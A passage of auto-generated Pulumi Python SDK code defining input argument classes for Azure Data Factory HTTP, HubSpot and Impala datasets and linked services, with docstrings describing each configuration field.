Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class HttpDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
additional_headers: Optional[Any] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
compression: Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
format: Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
relative_url: Optional[Any] = None,
request_body: Optional[Any] = None,
request_method: Optional[Any] = None,
structure: Optional[Any] = None):
"""
A file in an HTTP web server.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param Any additional_headers: The headers for the HTTP Request. e.g. request-header-name-1:request-header-value-1
...
request-header-name-n:request-header-value-n Type: string (or Expression with resultType string).
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']] compression: The data compression method used on files.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']] format: The format of files.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any relative_url: The relative URL based on the URL in the HttpLinkedService refers to an HTTP file Type: string (or Expression with resultType string).
:param Any request_body: The body for the HTTP request. Type: string (or Expression with resultType string).
:param Any request_method: The HTTP method for the HTTP request. Type: string (or Expression with resultType string).
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'HttpFile')
if additional_headers is not None:
pulumi.set(__self__, "additional_headers", additional_headers)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if compression is not None:
pulumi.set(__self__, "compression", compression)
if description is not None:
pulumi.set(__self__, "description", description)
if format is not None:
pulumi.set(__self__, "format", format)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if relative_url is not None:
pulumi.set(__self__, "relative_url", relative_url)
if request_body is not None:
pulumi.set(__self__, "request_body", request_body)
if request_method is not None:
pulumi.set(__self__, "request_method", request_method)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="additionalHeaders")
def additional_headers(self) -> Optional[Any]:
"""
The headers for the HTTP Request. e.g. request-header-name-1:request-header-value-1
...
request-header-name-n:request-header-value-n Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "additional_headers")
@additional_headers.setter
def additional_headers(self, value: Optional[Any]):
pulumi.set(self, "additional_headers", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def compression(self) -> Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]]:
"""
The data compression method used on files.
"""
return pulumi.get(self, "compression")
@compression.setter
def compression(self, value: Optional[pulumi.Input[Union['DatasetBZip2CompressionArgs', 'DatasetDeflateCompressionArgs', 'DatasetGZipCompressionArgs', 'DatasetZipDeflateCompressionArgs']]]):
pulumi.set(self, "compression", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def format(self) -> Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]]:
"""
The format of files.
"""
return pulumi.get(self, "format")
@format.setter
def format(self, value: Optional[pulumi.Input[Union['AvroFormatArgs', 'JsonFormatArgs', 'OrcFormatArgs', 'ParquetFormatArgs', 'TextFormatArgs']]]):
pulumi.set(self, "format", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="relativeUrl")
def relative_url(self) -> Optional[Any]:
"""
The relative URL based on the URL in the HttpLinkedService refers to an HTTP file Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "relative_url")
@relative_url.setter
def relative_url(self, value: Optional[Any]):
pulumi.set(self, "relative_url", value)
@property
@pulumi.getter(name="requestBody")
def request_body(self) -> Optional[Any]:
"""
The body for the HTTP request. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "request_body")
@request_body.setter
def request_body(self, value: Optional[Any]):
pulumi.set(self, "request_body", value)
@property
@pulumi.getter(name="requestMethod")
def request_method(self) -> Optional[Any]:
"""
The HTTP method for the HTTP request. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "request_method")
@request_method.setter
def request_method(self, value: Optional[Any]):
pulumi.set(self, "request_method", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class HttpLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
url: Any,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
authentication_type: Optional[pulumi.Input[str]] = None,
cert_thumbprint: Optional[Any] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
embedded_cert_data: Optional[Any] = None,
enable_server_certificate_validation: Optional[Any] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
user_name: Optional[Any] = None):
"""
Linked service for an HTTP source.
:param pulumi.Input[str] type: Type of linked service.
:param Any url: The base URL of the HTTP endpoint, e.g. http://www.microsoft.com. Type: string (or Expression with resultType string).
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] authentication_type: The authentication type to be used to connect to the HTTP server.
:param Any cert_thumbprint: Thumbprint of certificate for ClientCertificate authentication. Only valid for on-premises copy. For on-premises copy with ClientCertificate authentication, either CertThumbprint or EmbeddedCertData/Password should be specified. Type: string (or Expression with resultType string).
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any embedded_cert_data: Base64 encoded certificate data for ClientCertificate authentication. For on-premises copy with ClientCertificate authentication, either CertThumbprint or EmbeddedCertData/Password should be specified. Type: string (or Expression with resultType string).
:param Any enable_server_certificate_validation: If true, validate the HTTPS server SSL certificate. Default value is true. Type: boolean (or Expression with resultType boolean).
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: Password for Basic, Digest, Windows, or ClientCertificate with EmbeddedCertData authentication.
:param Any user_name: User name for Basic, Digest, or Windows authentication. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "type", 'HttpServer')
pulumi.set(__self__, "url", url)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if authentication_type is not None:
pulumi.set(__self__, "authentication_type", authentication_type)
if cert_thumbprint is not None:
pulumi.set(__self__, "cert_thumbprint", cert_thumbprint)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if embedded_cert_data is not None:
pulumi.set(__self__, "embedded_cert_data", embedded_cert_data)
if enable_server_certificate_validation is not None:
pulumi.set(__self__, "enable_server_certificate_validation", enable_server_certificate_validation)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if user_name is not None:
pulumi.set(__self__, "user_name", user_name)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def url(self) -> Any:
"""
The base URL of the HTTP endpoint, e.g. http://www.microsoft.com. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Any):
pulumi.set(self, "url", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> Optional[pulumi.Input[str]]:
"""
The authentication type to be used to connect to the HTTP server.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter(name="certThumbprint")
def cert_thumbprint(self) -> Optional[Any]:
"""
Thumbprint of certificate for ClientCertificate authentication. Only valid for on-premises copy. For on-premises copy with ClientCertificate authentication, either CertThumbprint or EmbeddedCertData/Password should be specified. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "cert_thumbprint")
@cert_thumbprint.setter
def cert_thumbprint(self, value: Optional[Any]):
pulumi.set(self, "cert_thumbprint", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="embeddedCertData")
def embedded_cert_data(self) -> Optional[Any]:
"""
Base64 encoded certificate data for ClientCertificate authentication. For on-premises copy with ClientCertificate authentication, either CertThumbprint or EmbeddedCertData/Password should be specified. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "embedded_cert_data")
@embedded_cert_data.setter
def embedded_cert_data(self, value: Optional[Any]):
pulumi.set(self, "embedded_cert_data", value)
@property
@pulumi.getter(name="enableServerCertificateValidation")
def enable_server_certificate_validation(self) -> Optional[Any]:
"""
If true, validate the HTTPS server SSL certificate. Default value is true. Type: boolean (or Expression with resultType boolean).
"""
return pulumi.get(self, "enable_server_certificate_validation")
@enable_server_certificate_validation.setter
def enable_server_certificate_validation(self, value: Optional[Any]):
pulumi.set(self, "enable_server_certificate_validation", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Password for Basic, Digest, Windows, or ClientCertificate with EmbeddedCertData authentication.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="userName")
def user_name(self) -> Optional[Any]:
"""
User name for Basic, Digest, or Windows authentication. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "user_name")
@user_name.setter
def user_name(self, value: Optional[Any]):
pulumi.set(self, "user_name", value)
@pulumi.input_type
class HubspotLinkedServiceArgs:
def __init__(__self__, *,
client_id: Any,
type: pulumi.Input[str],
access_token: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
client_secret: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
refresh_token: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
use_encrypted_endpoints: Optional[Any] = None,
use_host_verification: Optional[Any] = None,
use_peer_verification: Optional[Any] = None):
"""
Hubspot Service linked service.
:param Any client_id: The client ID associated with your Hubspot application.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] access_token: The access token obtained when initially authenticating your OAuth integration.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] client_secret: The client secret associated with your Hubspot application.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] refresh_token: The refresh token obtained when initially authenticating your OAuth integration.
:param Any use_encrypted_endpoints: Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
:param Any use_host_verification: Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
:param Any use_peer_verification: Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
pulumi.set(__self__, "client_id", client_id)
pulumi.set(__self__, "type", 'Hubspot')
if access_token is not None:
pulumi.set(__self__, "access_token", access_token)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if client_secret is not None:
pulumi.set(__self__, "client_secret", client_secret)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if refresh_token is not None:
pulumi.set(__self__, "refresh_token", refresh_token)
if use_encrypted_endpoints is not None:
pulumi.set(__self__, "use_encrypted_endpoints", use_encrypted_endpoints)
if use_host_verification is not None:
pulumi.set(__self__, "use_host_verification", use_host_verification)
if use_peer_verification is not None:
pulumi.set(__self__, "use_peer_verification", use_peer_verification)
@property
@pulumi.getter(name="clientId")
def client_id(self) -> Any:
"""
The client ID associated with your Hubspot application.
"""
return pulumi.get(self, "client_id")
@client_id.setter
def client_id(self, value: Any):
pulumi.set(self, "client_id", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="accessToken")
def access_token(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The access token obtained when initially authenticating your OAuth integration.
"""
return pulumi.get(self, "access_token")
@access_token.setter
def access_token(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "access_token", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="clientSecret")
def client_secret(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The client secret associated with your Hubspot application.
"""
return pulumi.get(self, "client_secret")
@client_secret.setter
def client_secret(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "client_secret", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="refreshToken")
def refresh_token(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The refresh token obtained when initially authenticating your OAuth integration.
"""
return pulumi.get(self, "refresh_token")
@refresh_token.setter
def refresh_token(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "refresh_token", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class HubspotObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Hubspot Service dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'HubspotObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class ImpalaLinkedServiceArgs:
def __init__(__self__, *,
authentication_type: pulumi.Input[str],
host: Any,
type: pulumi.Input[str],
allow_host_name_cn_mismatch: Optional[Any] = None,
allow_self_signed_server_cert: Optional[Any] = None,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
enable_ssl: Optional[Any] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
password: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
port: Optional[Any] = None,
trusted_cert_path: Optional[Any] = None,
use_system_trust_store: Optional[Any] = None,
username: Optional[Any] = None):
"""
Impala server linked service.
:param pulumi.Input[str] authentication_type: The authentication type to use.
:param Any host: The IP address or host name of the Impala server. (i.e. 192.168.222.160)
:param pulumi.Input[str] type: Type of linked service.
:param Any allow_host_name_cn_mismatch: Specifies whether to require a CA-issued SSL certificate name to match the host name of the server when connecting over SSL. The default value is false.
:param Any allow_self_signed_server_cert: Specifies whether to allow self-signed certificates from the server. The default value is false.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any enable_ssl: Specifies whether the connections to the server are encrypted using SSL. The default value is false.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] password: The password corresponding to the user name when using UsernameAndPassword.
:param Any port: The TCP port that the Impala server uses to listen for client connections. The default value is 21050.
:param Any trusted_cert_path: The full path of the .pem file containing trusted CA certificates for verifying the server when connecting over SSL. This property can only be set when using SSL on self-hosted IR. The default value is the cacerts.pem file installed with the IR.
:param Any use_system_trust_store: Specifies whether to use a CA certificate from the system trust store or from a specified PEM file. The default value is false.
:param Any username: The user name used to access the Impala server. The default value is anonymous when using SASLUsername.
"""
pulumi.set(__self__, "authentication_type", authentication_type)
pulumi.set(__self__, "host", host)
pulumi.set(__self__, "type", 'Impala')
if allow_host_name_cn_mismatch is not None:
pulumi.set(__self__, "allow_host_name_cn_mismatch", allow_host_name_cn_mismatch)
if allow_self_signed_server_cert is not None:
pulumi.set(__self__, "allow_self_signed_server_cert", allow_self_signed_server_cert)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if enable_ssl is not None:
pulumi.set(__self__, "enable_ssl", enable_ssl)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if password is not None:
pulumi.set(__self__, "password", password)
if port is not None:
pulumi.set(__self__, "port", port)
if trusted_cert_path is not None:
pulumi.set(__self__, "trusted_cert_path", trusted_cert_path)
if use_system_trust_store is not None:
pulumi.set(__self__, "use_system_trust_store", use_system_trust_store)
if username is not None:
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="authenticationType")
def authentication_type(self) -> pulumi.Input[str]:
"""
The authentication type to use.
"""
return pulumi.get(self, "authentication_type")
@authentication_type.setter
def authentication_type(self, value: pulumi.Input[str]):
pulumi.set(self, "authentication_type", value)
@property
@pulumi.getter
def host(self) -> Any:
"""
The IP address or host name of the Impala server. (i.e. 192.168.222.160)
"""
return pulumi.get(self, "host")
@host.setter
def host(self, value: Any):
pulumi.set(self, "host", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="allowHostNameCNMismatch")
def allow_host_name_cn_mismatch(self) -> Optional[Any]:
"""
Specifies whether to require a CA-issued SSL certificate name to match the host name of the server when connecting over SSL. The default value is false.
"""
return pulumi.get(self, "allow_host_name_cn_mismatch")
@allow_host_name_cn_mismatch.setter
def allow_host_name_cn_mismatch(self, value: Optional[Any]):
pulumi.set(self, "allow_host_name_cn_mismatch", value)
@property
@pulumi.getter(name="allowSelfSignedServerCert")
def allow_self_signed_server_cert(self) -> Optional[Any]:
"""
Specifies whether to allow self-signed certificates from the server. The default value is false.
"""
return pulumi.get(self, "allow_self_signed_server_cert")
@allow_self_signed_server_cert.setter
def allow_self_signed_server_cert(self, value: Optional[Any]):
pulumi.set(self, "allow_self_signed_server_cert", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
